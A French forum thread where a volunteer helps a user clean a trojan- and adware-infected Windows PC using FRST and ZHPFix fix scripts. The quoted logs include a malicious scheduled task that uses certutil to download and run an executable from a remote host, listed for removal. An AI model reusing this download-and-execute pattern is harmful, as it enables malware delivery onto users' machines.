Troyens que je'arrive pas supprimer , fenetres pub qui bloquent PC
Fermé
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
-
29 janv. 2019 à 11:10
FoufouParis - 1 févr. 2019 à 10:43
FoufouParis - 1 févr. 2019 à 10:43
A voir également:
- Bsvcupdater.exe
- Bloqueur de pub youtube - Guide
- Pc qui rame - Guide
- Youtube sans pub - Guide
- Test performance pc - Guide
- Reinitialiser pc - Guide
19 réponses
Bonjour,
Tout ce que tu me dis est intéressant mais... où sont les rapports de FRST ?
Me faut 3 rapports comme indiqué sur ce tutoriel à la fin : https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Donc ce que je te propose, reviens chez toi, poste les 3 rapports pour qu'on puisse t'aider.
Si tu as dû mal, tant qu'on y est au cyber, si tu as pris une clé usb avec toi, télécharge malwarebytes anti malware et installe le sur le pc infecté puis fais une analyse en suivant ce tuto : https://www.malekal.com/tutoriel-malwarebyte-anti-malware/
A te relire
Tout ce que tu me dis est intéressant mais... où sont les rapports de FRST ?
Me faut 3 rapports comme indiqué sur ce tutoriel à la fin : https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Donc ce que je te propose, reviens chez toi, poste les 3 rapports pour qu'on puisse t'aider.
Si tu as dû mal, tant qu'on y est au cyber, si tu as pris une clé usb avec toi, télécharge malwarebytes anti malware et installe le sur le pc infecté puis fais une analyse en suivant ce tuto : https://www.malekal.com/tutoriel-malwarebyte-anti-malware/
A te relire
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
29 janv. 2019 à 14:37
29 janv. 2019 à 14:37
Merci Foufou , j ai du mal ne serait ce qu a ecrire une phrase .....
VOILA ce qui ressort :
_ pour FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20190129_b15d8h14w11d5
_ pour addition :
https://pjjoint.malekal.com/files.php?id=20190129_k6d11f13p8k10
_ pour shortcut :
https://pjjoint.malekal.com/files.php?id=20190129_z88z5o14i12
En te remerciant !
VOILA ce qui ressort :
_ pour FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20190129_b15d8h14w11d5
_ pour addition :
https://pjjoint.malekal.com/files.php?id=20190129_k6d11f13p8k10
_ pour shortcut :
https://pjjoint.malekal.com/files.php?id=20190129_z88z5o14i12
En te remerciant !
Bonjour,
Désinstalle :
- Webcompanion
- YoutubeAdblock
1.Voici la correction à effectuer avec FRST
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
2- Dans le bloc-note clique sur Fichier puis sur Enregistrer ferme le bloc-note.
3- Revient dans FRST qui est ouvert, clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet : https://forums.commentcamarche.net/forum/affich-37585758-reinitialiser-son-navigateur
6.Fais une analyse MBAM en suivant ce tutoriel : https://www.malekal.com/tutoriel-malwarebyte-anti-malware/
Dis moi comment se comporte ton pc, a te lire.
Désinstalle :
- Webcompanion
- YoutubeAdblock
1.Voici la correction à effectuer avec FRST
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [WanderingSound] => C:\Windows\rss\csrss.exe [4554240 2019-01-29] () <==== ATTENTION
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [hsdfb87sdfbsZYSXa] => C:\Users\AMINE\AppData\Local\Temp\8F86.tmp.exe [299520 2019-01-28] () <==== ATTENTION
GroupPolicy: Restriction - Windows Defender <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-01-28] () [Fichier non signé] <==== ATTENTION
S2 bjiqbhbr; C:\Windows\system32\bjiqbhbr\ddcithor.exe [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - Pas de fichier
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Google\TGUQ8I3LQ51O\yvWdY+cvVn.exe [253440 2019-01-28] ()
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [1685481] => C:\Users\AMINE\AppData\Roaming\av4n0n1cbpi\tllc2c5y0em.exe [775738 2019-01-28] ( )
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe [7410464 2019-01-29] (Lavasoft)
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [9619999] => C:\Users\AMINE\AppData\Roaming\03sbsneqiyc\ob3h1nsvzik.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [A0Q9PZFEWY8SCW1] => C:\Program Files\YZGEOV5S1T\YZGEOV5S1.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [7474206] => C:\Users\AMINE\AppData\Roaming\zxf1xoyrivt\jdkxn5tykfr.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [YXX6AKTJEOT3O17] => C:\Program Files\7AUGXHFASX\7AUGXHFAS.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [2970469] => C:\Users\AMINE\AppData\Roaming\4aeyxrv2csj\dw3vxj2rhh5.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [4Z0F7I8LOFEWM55] => C:\Program Files\QY7FZ6ZO34\X2V1Z9V7X.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [DVF56R16NMZ7HEL] => C:\Program Files\BHKUYPI4HU\BHKUYPI4H.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [891713] => C:\Users\AMINE\AppData\Roaming\oznwvsszwsl\0qrf4ju5uic.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [XU1H158JNXKGJEZ] => C:\Program Files\JKI1B1AJT5\JKI1B1AJT.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [20000] => C:\Users\AMINE\AppData\Roaming\l0voufwmrvk\rbjnpu1fxpo.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [hsdfb87sdfbsZYSXa] => C:\Users\AMINE\AppData\Local\Temp\8F86.tmp.exe [299520 2019-01-28] () <==== ATTENTION HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [41RL45C815KNDRA] => C:\Program Files\RP8G7S191W\RP8G7S191.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [1364197] => C:\Users\AMINE\AppData\Roaming\rphjrozqfyg\nttkfrvkegg.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [A3F28AC1AHAX5XY] => C:\Program Files\APNFCLDP5M\T5R95NTVR.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [941293] => C:\Users\AMINE\AppData\Roaming\umzuap55jir\o2aklulvbk0.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [33599] => C:\Users\AMINE\AppData\Roaming\vyujgpq5ij1\yd4osjpwigp.exe [775738 2019-01-28] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [LBHCF5KY8H497PJ] => C:\Program Files\X8JCF318D8\MMW6V2EAB.exe [791552 2019-01-28] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [ZFRY6V8QMITYXNJ] => C:\Program Files\9GXPEC1UKX\9GXPEC1UK.exe [791552 2019-01-29] (9PNTR) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [6780262] => C:\Users\AMINE\AppData\Roaming\mtco3e1eycj\yzkjlt1y2rq.exe [775738 2019-01-29] ( ) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [KHIWGQ2RX5JV0NK] => C:\Program Files\KIMFXYYMWL\2AOQCAVV7.exe [986624 2019-01-29] (PW0RK) HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [2155231] => C:\Users\AMINE\AppData\Roaming\5pg4nijvsho\dxardxfylro.exe [694994 2019-01-29] (DDD )
SearchScopes: HKU\S-1-5-21-1333819402-4268670352-963233347-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1333819402-4268670352-963233347-1001 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190128&q={searchTerms}
BHO: YoutubeAdBlock -> {E81D3BD4-0E3E-4B58-BEC1-F3791DAA11A8} -> C:\Program Files\eWuDAKEgxIE\kkvtUqip.dll [2019-01-29] ()
2019-01-29 13:34 - 2019-01-29 13:34 - 000000000 ____D C:\ProgramData\eJBlAwaaSdTwMIVB 2019-01-29 13:34 - 2019-01-29 13:34 - 000000000 ____D C:\Program Files\vgjjPxjnrdvSplcncAR 2019-01-29 13:34 - 2019-01-29 13:34 - 000000000 ____D C:\Program Files\OKuaQUguzkJU2 2019-01-29 13:34 - 2019-01-29 13:34 - 000000000 ____D C:\Program Files\bLMoOsEEbuuGC 2019-01-29 13:33 - 2019-01-29 13:34 - 000000000 ____D C:\Program Files\WsxLtZnpU 2019-01-29 13:33 - 2019-01-29 13:33 - 000000000 ____D C:\Program Files\eWuDAKEgxIE
2019-01-29 13:30 - 2019-01-29 13:30 - 000000000 ____D C:\Users\AMINE\AppData\Roaming\5pg4nijvsho 2019-01-29 13:30 - 2019-01-29 13:30 - 000000000 ____D C:\Program Files\KIMFXYYMWL
2019-01-28 14:43 - 2019-01-28 14:42 - 001632256 _____ (TODO: <Company name>) C:\Users\AMINE\AppData\Local\RonFax.exe 2019-01-28 14:43 - 2019-01-28 14:42 - 001632256 _____ (TODO: <Company name>) C:\Users\AMINE\AppData\Local\Kontamin.exe
C:\Windows\rss\csrss.exe
C:\Users\AMINE\AppData\Local\Temp\8F86.tmp.exe
2019-01-28 18:51 - 2019-01-28 18:51 - 000299520 __RSH () C:\Users\AMINE\AppData\Local\Temp\8F86.tmp.exe 2017-03-07 12:43 - 2017-03-07 12:43 - 001118360 _____ (© 2015 Microsoft Corporation) C:\Users\AMINE\AppData\Local\Temp\BSvcProcessor.exe 2017-03-07 12:43 - 2017-03-07 12:43 - 000170128 _____ (© 2015 Microsoft Corporation) C:\Users\AMINE\AppData\Local\Temp\BSvcUpdater.exe 2019-01-28 14:46 - 2019-01-28 14:46 - 000375522 _____ ( ) C:\Users\AMINE\AppData\Local\Temp\rpeekns5g4v.exe 2016-05-14 21:46 - 2017-02-08 19:35 - 043976160 _____ (Skype Technologies S.A.) C:\Users\AMINE\AppData\Local\Temp\SkypeSetup.exe 2019-01-28 21:22 - 2019-01-28 17:10 - 000099886 _____ () C:\Users\AMINE\AppData\Local\Temp\Uninstall.exe 2017-04-14 21:18 - 2017-04-14 21:18 - 014456872 _____ (Microsoft Corporation) C:\Users\AMINE\AppData\Local\Temp\vc_redist.x86.exe
YoutubeAdBlock (HKLM\...\1655C0CA-7AE7-4012-8502-970C8675E5F8) (Version: 2.0.0.764 - Company Inc.) <==== ATTENTION
Task: {27949EB6-F67C-4575-AF47-15A7FD50A8B8} - System32\Tasks\BoxSoftwareUpdate => C:\ProgramData\BoxUpdChk\updchk.exe <==== ATTENTION
Task: {3D417F07-204C-4FF4-818E-D3FA46DB9A39} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-29] () <==== ATTENTION
Task: {98592D7B-58B8-460C-AA8F-481CCF8A04D1} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe C:\Users\AMINE\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AMINE\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {F0674B89-B3BE-48BE-9DD2-68B56F9766E9} - System32\Tasks\Chess Titans => C:\Users\AMINE\AppData\Local\Temp\is-INIR3.tmp\prsetup.exe [2018-05-20] (Microsoft Games ) <==== ATTENTION
C:\Program Files\Lavasoft\Web Companion\
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
2- Dans le bloc-note clique sur Fichier puis sur Enregistrer ferme le bloc-note.
3- Revient dans FRST qui est ouvert, clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet : https://forums.commentcamarche.net/forum/affich-37585758-reinitialiser-son-navigateur
6.Fais une analyse MBAM en suivant ce tutoriel : https://www.malekal.com/tutoriel-malwarebyte-anti-malware/
Dis moi comment se comporte ton pc, a te lire.
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
29 janv. 2019 à 15:55
29 janv. 2019 à 15:55
youtube adblock et companion ont deja ete desinstallés mais ils reviennent sans cesse ...
Bon je m ' y colle et te reviens des que j ai les premiers resultats !
Bon je m ' y colle et te reviens des que j ai les premiers resultats !
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 03:12
31 janv. 2019 à 03:12
Voilà , ça été long et pénible , mais plusieurs remarques à faire cependant :
_ la correction a duré toute la nuit et j'ai du l'arreter , j'ai puavoir cependant le fixlog que je joins ici :
https://pjjoint.malekal.com/files.php?id=20190131_x13m15m6r11p13
j'ai fait une analyse malwarebytes après la correction , et je joins un lien pour le résumé de l'analyse ( 313 menaces) :
https://pjjoint.malekal.com/files.php?id=20190131_j6e510s13o11
J'ai refait tourner malwarebytes une seconde fois , plus que 7 menaces , toutes en quarantaine puis toutes supprimées.
La troisième a été la bonne , malwarebytes ne détecte plus rien ;)
J'ai un gros problème cependant, après avoir réinitialisé mon firefox (réparer Firefox) , celui ci me dit que le profil firefox n'est pas accessible ou introuvable . Idem en le désinstallant et en le réinstallant , du coup j'ai remis google chrome en attendant.
Je vais faire tourner Microsoft security essential an allant me coucher pour voir ce que ça donne;
J'espère que le fixlog est concluant et que je n'ai pas fait de bêtises ! ;)
merci et bonne nuit
_ la correction a duré toute la nuit et j'ai du l'arreter , j'ai puavoir cependant le fixlog que je joins ici :
https://pjjoint.malekal.com/files.php?id=20190131_x13m15m6r11p13
j'ai fait une analyse malwarebytes après la correction , et je joins un lien pour le résumé de l'analyse ( 313 menaces) :
https://pjjoint.malekal.com/files.php?id=20190131_j6e510s13o11
J'ai refait tourner malwarebytes une seconde fois , plus que 7 menaces , toutes en quarantaine puis toutes supprimées.
La troisième a été la bonne , malwarebytes ne détecte plus rien ;)
J'ai un gros problème cependant, après avoir réinitialisé mon firefox (réparer Firefox) , celui ci me dit que le profil firefox n'est pas accessible ou introuvable . Idem en le désinstallant et en le réinstallant , du coup j'ai remis google chrome en attendant.
Je vais faire tourner Microsoft security essential an allant me coucher pour voir ce que ça donne;
J'espère que le fixlog est concluant et que je n'ai pas fait de bêtises ! ;)
merci et bonne nuit
Bonjour,
Désinstalle Mozilla Firefox en utilisant ce logiciel : https://www.malekal.com/revo-uninstaller-desinstaller-application-facilement/
Refais moi une analyse FRST comme tu l'as déjà fait !
On va utiliser un nouvel outil d'analyse en complément :
Suis ce tutoriel https://www.nicolascoolman.com/fr/tutoriaux/ (ZHPDiag uniquement) et joint le rapport
A bientôt
Désinstalle Mozilla Firefox en utilisant ce logiciel : https://www.malekal.com/revo-uninstaller-desinstaller-application-facilement/
Refais moi une analyse FRST comme tu l'as déjà fait !
On va utiliser un nouvel outil d'analyse en complément :
Suis ce tutoriel https://www.nicolascoolman.com/fr/tutoriaux/ (ZHPDiag uniquement) et joint le rapport
A bientôt
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 13:11
31 janv. 2019 à 13:11
Salut Foufou , merci pour le suivi ;)
j'ai pu désinstaller Firefox avec Revo et c'est vrai qu'il y avait pas mal de" résidus"
je te joins le dernier rapport d'analyse FRST que j'ai exécuté juste après :
_ pour FRST : https://pjjoint.malekal.com/files.php?id=FRST_20190131_h8q8j8r15g8
_ pour addition : https://pjjoint.malekal.com/files.php?id=20190131_q5h1313y10b13
_ pour shortcut : https://pjjoint.malekal.com/files.php?id=20190131_z6z6d12c6x15
Voici le rapport ZHPDiag lancé dans la foulée , :
https://pjjoint.malekal.com/files.php?id=20190131_d14d8t6m11s11
merci encore de ton aide précieuse !
j'ai pu désinstaller Firefox avec Revo et c'est vrai qu'il y avait pas mal de" résidus"
je te joins le dernier rapport d'analyse FRST que j'ai exécuté juste après :
_ pour FRST : https://pjjoint.malekal.com/files.php?id=FRST_20190131_h8q8j8r15g8
_ pour addition : https://pjjoint.malekal.com/files.php?id=20190131_q5h1313y10b13
_ pour shortcut : https://pjjoint.malekal.com/files.php?id=20190131_z6z6d12c6x15
Voici le rapport ZHPDiag lancé dans la foulée , :
https://pjjoint.malekal.com/files.php?id=20190131_d14d8t6m11s11
merci encore de ton aide précieuse !
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 13:49
31 janv. 2019 à 13:49
oops franchement je le vois pas sur l'architecture de l'ordi (j'ai lancé une recherche lecteur i , rien trouvé)
le seul lecteur présent est le lecteur DVD nommé G
le seul lecteur présent est le lecteur DVD nommé G
ok on continue !
Refais une correction FRST avec ce script :
Refais moi une analyse ZHPDiag après correction, a te relire
Refais une correction FRST avec ce script :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [hEeFx6jXpx.exe] => C:\Program Files\Google\TGUQ8I3LQ51O\hEeFx6jXpx.exe HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [20000] => "C:\Users\AMINE\AppData\Roaming\l0voufwmrvk\rbjnpu1fxpo.exe" /VERYSILENT HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\Run: [33599] => "C:\Users\AMINE\AppData\Roaming\vyujgpq5ij1\yd4osjpwigp.exe" /VERYSILENT HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\MountPoints2: {278206eb-768c-11e5-9dcb-00247e4b5a32} - I:\iLinker.exe HKU\S-1-5-21-1333819402-4268670352-963233347-1001\...\MountPoints2: {417fca5e-8893-11e2-90d0-00247e4b5a32} - I:\LGAutoRun.exe
2019-01-31 02:44 - 2019-01-31 11:49 - 000001054 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2019-01-31 02:44 - 2019-01-31 10:42 - 000001050 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2017-03-07 12:43 - 2017-03-07 12:43 - 001118360 _____ (© 2015 Microsoft Corporation) C:\Users\AMINE\AppData\Local\Temp\BSvcProcessor.exe 2017-03-07 12:43 - 2017-03-07 12:43 - 000170128 _____ (© 2015 Microsoft Corporation) C:\Users\AMINE\AppData\Local\Temp\BSvcUpdater.exe 2016-05-14 21:46 - 2017-02-08 19:35 - 043976160 _____ (Skype Technologies S.A.) C:\Users\AMINE\AppData\Local\Temp\SkypeSetup.exe 2019-01-28 21:22 - 2019-01-28 17:10 - 000099886 _____ () C:\Users\AMINE\AppData\Local\Temp\Uninstall.exe 2017-04-14 21:18 - 2017-04-14 21:18 - 014456872 _____ (Microsoft Corporation) C:\Users\AMINE\AppData\Local\Temp\vc_redist.x86.exe
C:\Users\AMINE\AppData\Roaming\Mozilla\Firefox\Profiles\zswlzyco.default [non trouvé(e)] <==== ATTENTION
Task: {27949EB6-F67C-4575-AF47-15A7FD50A8B8} - System32\Tasks\BoxSoftwareUpdate => C:\ProgramData\BoxUpdChk\updchk.exe <==== ATTENTION
Task: {F0674B89-B3BE-48BE-9DD2-68B56F9766E9} - System32\Tasks\Chess Titans => C:\Users\AMINE\AppData\Local\Temp\is-INIR3.tmp\prsetup.exe [2018-05-20] (Microsoft Games ) <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [5372398]
C:\Users\AMINE\AppData\Roaming\l0voufwmrvk\rbjnpu1fxpo.exe (.Not File.) C:\Users\AMINE\AppData\Roaming\vyujgpq5ij1\yd4osjpwigp.exe (.Not File.)
HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [hEeFx6jXpx.exe] . (. - .) -- C:\Program Files\Google\TGUQ8I3LQ51O\hEeFx6jXpx.exe (.Not File.) =>.SUP.Orphan O4 - HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [Web Companion] . (. - .) -- C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe (.Not File.) =>.SUP.Orphan
HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [20000] . (. - .) -- C:\Users\AMINE\AppData\Roaming\l0voufwmrvk\rbjnpu1fxpo.exe (.Not File.) =>.SUP.Orphan
HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [33599] . (. - .) -- C:\Users\AMINE\AppData\Roaming\vyujgpq5ij1\yd4osjpwigp.exe (.Not File.) =>.SUP.Orphan
R0 - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.globasearch.com/ =>PUP.Optional.IMBooster R0 - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.globasearch.com/ =>PUP.Optional.IMBooster
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion HKCU\Software\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion HKLM\SOFTWARE\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion
HKLM\SOFTWARE\Lavasoft =>.Lavasoft
HKCU\SOFTWARE\Softonic
O45 - LFCP:[MD5.5DF9C441AB0337276DD238DECBC2FA5E] 28/01/2019 A -- C:\Windows\Prefetch\QUOTEEX.EXE-6844FE42.pf =>PUP.Optional.Graftor
O69 - SBI: SearchScopes [HKCU]{B53717E6-1A69-4880-A01B-F8D69FE26444} [DefaultScope] - () - http://www.globasearch.com/ =>PUP.Optional.IMBooster O69 - SBI: SearchScopes [HKCU]{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} - (Ad-Aware SecureSearch) - http://securedsearch.lavasoft.com/ O69 - SBI: SearchScopes [HKLM]{0633EE93-D776-472f-A0FF-E1416B8B2E3A} [DefaultScope] - () - http://www.globasearch.com/ =>PUP.Optional.IMBooster
O69 - SBI: prefs.js [AMINE - 3gaizwt5.default-1548895366067] user_pref("browser.startup.homepage", "http://www.globasearch.com/?serie=225&b=2&installkey=QjGO0z0dNXcmdl8Abm4x"); =>PUP.Optional.IMBooster O69 - SBI: prefs.js [AMINE - 3gaizwt5.default-1548895366067] user_pref("browser.newtab.url", "http://www.globasearch.com/?serie=225&b=2&installkey=QjGO0z0dNXcmdl8Abm4x&newtab"); =>PUP.Optional.IMBooster
O87 - FAEL: "{C7F1B303-9A0C-4F0E-8FD1-65FB47305C47}" [In-None-P6-TRUE] .(...) -- C:\Program Files\Microsoft\Skype for Desktop\Skype.exe (.not file.) =>.SUP.Orphan O87 - FAEL: "{EE7F7FBD-0BB8-4A4F-8B69-1471FCAC32B9}" [In-None-P17-TRUE] .(...) -- C:\Program Files\Microsoft\Skype for Desktop\Skype.exe (.not file.) =>.SUP.Orphan
HKLM\SOFTWARE\Microsoft\Tracing\boxore_RASAPI32 =>PUP.Optional.Boxore HKLM\SOFTWARE\Microsoft\Tracing\boxore_RASDLG =>PUP.Optional.Boxore HKLM\SOFTWARE\Microsoft\Tracing\boxore_RASMANCS =>PUP.Optional.Boxore HKLM\SOFTWARE\Microsoft\Tracing\ReimageRepair (1)_RASAPI32 =>.SUP.ReimageRepair HKLM\SOFTWARE\Microsoft\Tracing\ReimageRepair (1)_RASMANCS =>.SUP.ReimageRepair
C:\ProgramData\BoxUpdChk =>PUP.Optional.Boxore C:\Windows\Prefetch\QUOTEEX.EXE-6844FE42.pf =>PUP.Optional.Graftor HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{B53717E6-1A69-4880-A01B-F8D69FE26444} =>PUP.Optional.IMBooster HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} =>PUP.Optional.IMBooster C:\Windows\Installer\10a8b3b.msp =>.SUP.Obsolete.Adobe C:\Windows\Installer\1c7ea0.msp =>.SUP.Obsolete.Adobe HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\boxore_RASAPI32 =>PUP.Optional.Boxore HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\boxore_RASDLG =>PUP.Optional.Boxore HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\boxore_RASMANCS =>PUP.Optional.Boxore HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\ReimageRepair (1)_RASAPI32 =>.SUP.ReimageRepair HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\ReimageRepair (1)_RASMANCS =>.SUP.ReimageRepair C:\Users\AMINE\AppData\Local\Google\Chrome\User Data\Default\File System\000 =>.SUP.Temporary.Chrome C:\Users\AMINE\AppData\Local\Google\Chrome\User Data\Default\File System\001 =>.SUP.Temporary.Chrome HKU\S-1-5-21-1333819402-4268670352-963233347-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion HKCU\Software\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion HKLM\SOFTWARE\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Refais moi une analyse ZHPDiag après correction, a te relire
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 14:48
31 janv. 2019 à 14:48
Bien, voici le fixlog de FRST :
_ https://pjjoint.malekal.com/files.php?id=20190131_y8w9l5t5x10
et voici le rapport de ZHPDIAG effectué dans la fouléée :
_ https://pjjoint.malekal.com/files.php?id=20190131_q10i7u9c15y5
j'ai également fait tourné malwarebytes , - menaces sont réapparus (4 pup et 2 hijack)
_ https://pjjoint.malekal.com/files.php?id=20190131_y8w9l5t5x10
et voici le rapport de ZHPDIAG effectué dans la fouléée :
_ https://pjjoint.malekal.com/files.php?id=20190131_q10i7u9c15y5
j'ai également fait tourné malwarebytes , - menaces sont réapparus (4 pup et 2 hijack)
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 15:07
31 janv. 2019 à 15:07
je le fais automatiquement , la dernière suppression date d'il y a 5 mins , là il y en avait encore 5
comme l'impression que ce son les mêmes qui reviennent
comme l'impression que ce son les mêmes qui reviennent
Ensuite :
https://www.nicolascoolman.com/fr/tutoriaux/ (ZHPFix cette fois)
Insère ce script :
Redémarre le pc si on te le demande !
Héberge le rapport ZHPFix, comment se comporte ton pc ?
https://www.nicolascoolman.com/fr/tutoriaux/ (ZHPFix cette fois)
Insère ce script :
Script ZHPFix
EmptyCLSID
EmptyFlash
EmptyTemp
EmptyTracing
EmptyPrefetch
EmptyProxy
M0 - MFSP: prefs.js [AMINE - 3gaizwt5.default-1548895366067] http://www.globasearch.com/ =>PUP.Optional.IMBooster
